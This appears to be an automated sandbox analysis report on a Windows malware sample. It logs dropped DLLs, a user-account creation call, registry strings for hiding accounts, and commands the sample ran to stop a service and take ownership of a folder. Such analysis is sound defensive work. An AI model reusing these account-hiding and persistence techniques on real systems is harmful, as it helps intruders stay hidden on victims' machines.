Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DF2.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: DF2.exe

Static file information: File size 8630784 > 1048576

Source: DF2.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x69ac00

Source:	Binary string: RfxVmt.pdb source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr
Source:	Binary string: RfxVmt.pdbGCTL source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.21.dr, update.pkg.10.dr

Source: rfxvmt.dll.21.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CCFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

5_2_00007FF764CCFF1F

Source: DF2.exe	Static PE information: section name: .didata
Source: w8m7wmyk939oczmkw4o2h16hs.exe.1.dr	Static PE information: section name: .xdata
Source: nju2apmx83wqd9u7namsf59y.exe.1.dr	Static PE information: section name: .xdata
Source: main.exe.10.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.21.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.21.dr	Static PE information: section name: .xdata
Source: samctl.dll.21.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.21.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.21.dr	Static PE information: section name: .xdata
Source: cnccli.dll.21.dr	Static PE information: section name: .xdata
Source: libi2p.dll.21.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.21.dr	Static PE information: section name: .xdata
Source: DkzUMxZ8.21.dr	Static PE information: section name: .xdata
Source: bT51Gn7Q.21.dr	Static PE information: section name: .xdata
Source: LcUJSdZq.21.dr	Static PE information: section name: .xdata
Source: 5P46VR1V.21.dr	Static PE information: section name: .xdata
Source: 6KasAPG0.21.dr	Static PE information: section name: .xdata
Source: YERHbDgw.21.dr	Static PE information: section name: .xdata
Source: yGODxgsj.21.dr	Static PE information: section name: .xdata
Source: DiEI7oU1.21.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_0299F262 push es; retf	0_2_0299F263
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_0298675D push esi; ret	0_2_0298675F
Source: C:\Users\user\Desktop\DF2.exe	Code function: 0_2_02983D4E push eax; iretd	0_2_02983D4F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11ECFC37 push rsp; ret	21_2_00007FFE11ECFC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE126DFC37 push rsp; ret	32_2_00007FFE126DFC38

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 21_2_00007FFE0E16521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

21_2_00007FFE0E16521B

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DiEI7oU1	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DkzUMxZ8	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\yGODxgsj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\LcUJSdZq	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\YERHbDgw	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\5P46VR1V	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\2s3EMNnh	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\bT51Gn7Q	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DF2.exe	File created: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6KasAPG0	Jump to dropped file
Source: C:\Users\user\Desktop\DF2.exe	File created: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DiEI7oU1	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DkzUMxZ8	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\yGODxgsj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\LcUJSdZq	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\YERHbDgw	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\5P46VR1V	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\2s3EMNnh	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\bT51Gn7Q	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6KasAPG0	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\2s3EMNnh	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DkzUMxZ8	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\bT51Gn7Q	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\LcUJSdZq	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\5P46VR1V	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\6KasAPG0	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\YERHbDgw	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\yGODxgsj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\DiEI7oU1	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 21_2_00007FF76A908C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

21_2_00007FF76A908C4A

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2913723801.00007FFE11784000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.2913723801.00007FFE11784000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.10.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.10.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\DF2.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
